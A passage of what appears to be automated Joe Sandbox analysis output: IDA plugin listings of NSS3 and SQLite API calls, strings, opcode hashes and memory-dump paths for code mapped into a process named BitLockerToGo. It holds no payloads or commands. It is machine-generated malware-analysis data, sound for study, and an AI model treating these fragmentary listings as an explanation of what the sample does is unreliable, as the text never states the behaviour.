                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C660A48
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 115324291-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 941cfb958ebae50c210f293a759a6e0a448e1461d8265489af6bbc6d9c933645
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4cf15f7a689110fdf31624aeadf766efea49ddb6cef523b0d8fd501c92730aef
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 941cfb958ebae50c210f293a759a6e0a448e1461d8265489af6bbc6d9c933645
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3902F0B1E002059FEB008F66DC40BAB77B9EF49318F144139ED05A7B52E732E955CB9A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_NormalizeTime.NSS3(00000000,?), ref: 6C6ECEA5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: NormalizeTime
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1467309002-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3925dcc75932ac9c57ca853eb47738748d3f4f383806342d8d4595d78d67988f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b0b74b4ba9ef43febaae36fd53cad4215432c3a59f9c69cbc567200dc126435d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3925dcc75932ac9c57ca853eb47738748d3f4f383806342d8d4595d78d67988f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD717371A097418FC704CF28C84062ABBE5FFC9314F258A2EE469CB7A1E730D956CB55
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75D086
                                                                                                                                                                                                                                                                                                                                                          • PR_Malloc.NSS3(00000001), ref: 6C75D0B9
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C75D138
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: >
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 154ef9eb86cd4c7fb332ac2d35f451568b2b387a7f5359694ccf0c7225c5ae50
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9D18D22B416464BFB14487D8FA13EA779387663B4FD84339D1218BBE5EE19C863C345
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d31e19e0dc53ec2c1030c39c625c5bbf5219ffe5d0255a2729bbebce8c3119ee
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b39378a63a3b1dc45a01f1e14ade6d4fd95fa1acfad0a93f1b0c487d99e8b4d1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d31e19e0dc53ec2c1030c39c625c5bbf5219ffe5d0255a2729bbebce8c3119ee
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F1BC71F0121A8BEB04CF68D9407AE77F2BB8A308F258239D915D7B54EB749952CBC4
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C6B1052
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C6B1086
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                                                                          • String ID: h(kl$h(kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1297977491-3810936736
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 14cab9ae6ea9fa6c5f7b6ad6fc8ddc5096aa70c859aac1340d4e2109dd1807a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 284c9cb2296010198357759461c09c7c66e8f2fc1a44f0e55898945d802025ad
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14cab9ae6ea9fa6c5f7b6ad6fc8ddc5096aa70c859aac1340d4e2109dd1807a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86A14F71B0124A9FDF08CF99C994AEEBBB6BF88314B148129E905B7700DB35EC11CB94
APIs
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C6A5E08
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C6A5E3F
• PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C6A5E5C
• free.MOZGLUE(00000000), ref: 6C6A5E7E
• free.MOZGLUE(00000000), ref: 6C6A5E97
• PORT_Strdup_Util.NSS3(secmod.db), ref: 6C6A5EA5
• _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C6A5EBB
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C6A5ECB
• PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C6A5EF0
• free.MOZGLUE(00000000), ref: 6C6A5F12
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C6A5F35
• PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C6A5F5B
• free.MOZGLUE(00000000), ref: 6C6A5F82
• PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C6A5FA3
• PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C6A5FB7
• NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6A5FC4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5FDB
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C6A5FE9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5FFE
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C6A600C
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A6027
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C6A605A
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C77AAF9,00000000), ref: 6C6A606A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A607C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A609A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A60B2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A60CE
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1427204090-154007103
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e963644eceecac89c9d6a1b3652e652621c3b315e3b93f551f2b52fb7ca64ac7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a2ba538d20d98e84bdcbcfe2f298cec6feaa3362f95b94341e032e4f7635b7da
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e963644eceecac89c9d6a1b3652e652621c3b315e3b93f551f2b52fb7ca64ac7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8091F9F09046055BEF11CFA59D45BAA3BA4AF0634CF080060ED5597B42E731DD57CBBA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C750A22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C750A35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C633810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C63382A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C633810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C633879
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C750A66
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C750A70
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C750A9D
                                                                                                                                                                                                                                                                                                                                                          • PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C750AC8
                                                                                                                                                                                                                                                                                                                                                          • PR_vsmprintf.NSS3(?,?), ref: 6C750AE8
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C750B19
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(00000000), ref: 6C750B48
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(?), ref: 6C750B88
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C750C36
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750C45
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C750C5D
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C750C76
                                                                                                                                                                                                                                                                                                                                                          • PR_LogFlush.NSS3 ref: 6C750C7E
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C750C8D
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750C9C
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(?), ref: 6C750CD1
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C750CEC
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750CFB
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(00000000), ref: 6C750D16
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C750D26
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750D35
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(0000000A), ref: 6C750D65
                                                                                                                                                                                                                                                                                                                                                          • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C750D70
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750D7E
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C750D90
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C750D99
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C750A5B
                                                                                                                                                                                                                                                                                                                                                          • %ld[%p]: , xrefs: 6C750A96
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3820836880-2800039365
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a68de58543dd80929dcda40f6fa3a9c1af7aef19423acca44e9135845fd3ea38
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d1404e823ced8ab576f5256397dc7659632db339aea5b62139f18c3d7fe4fe19
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68de58543dd80929dcda40f6fa3a9c1af7aef19423acca44e9135845fd3ea38
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76A1E574A00294DFEF109F68DC89BEA3B78AF1331CF4806B4E80993261DF7599A5CB51
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,6C5DBE66), ref: 6C716E81
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C5DBE66), ref: 6C716E98
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C77AAF9,?,?,?,?,?,?,6C5DBE66), ref: 6C716EC9
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C5DBE66), ref: 6C716ED2
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C5DBE66), ref: 6C716EF8
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716F1F
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716F28
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716F3D
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C5DBE66), ref: 6C716FA6
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C77AAF9,00000000,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716FDB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716FE4
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C716FEF
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C717014
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,6C5DBE66), ref: 6C71701D
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C5DBE66), ref: 6C717030
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C5DBE66), ref: 6C71705B
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C5DBE66), ref: 6C717079
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C717097
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C5DBE66), ref: 6C7170A0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                                                                                                                                                          • String ID: Pul$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 593473924-779637076
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: accfd20f053de519ffa379ea78fe5fded9e7487abce5f14655d5688df4cb1fa2
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dc6b6cfaa8a525ad9a2696447921d938ada7dcb10f354c0fe54cc2fc81d0e597
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: accfd20f053de519ffa379ea78fe5fded9e7487abce5f14655d5688df4cb1fa2
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 235149B1B082119BE70056709D59FBB366ADBD2318F18463CE90596FC1FF25AA1E82D3
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6575C2,00000000,00000000,00000001), ref: 6C6A5009
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6575C2,00000000), ref: 6C6A5049
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A505D
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C6A5071
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5089
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A50A1
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6A50B2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6575C2), ref: 6C6A50CB
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A50D9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6A50F5
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5103
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A511D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A512B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5145
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5153
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A516D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C6A517B
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A5195
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                                                                                                                                                                                                                                                          • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4C50
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4C5B
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C77AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4C76
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4CAE
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4CC9
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4CF4
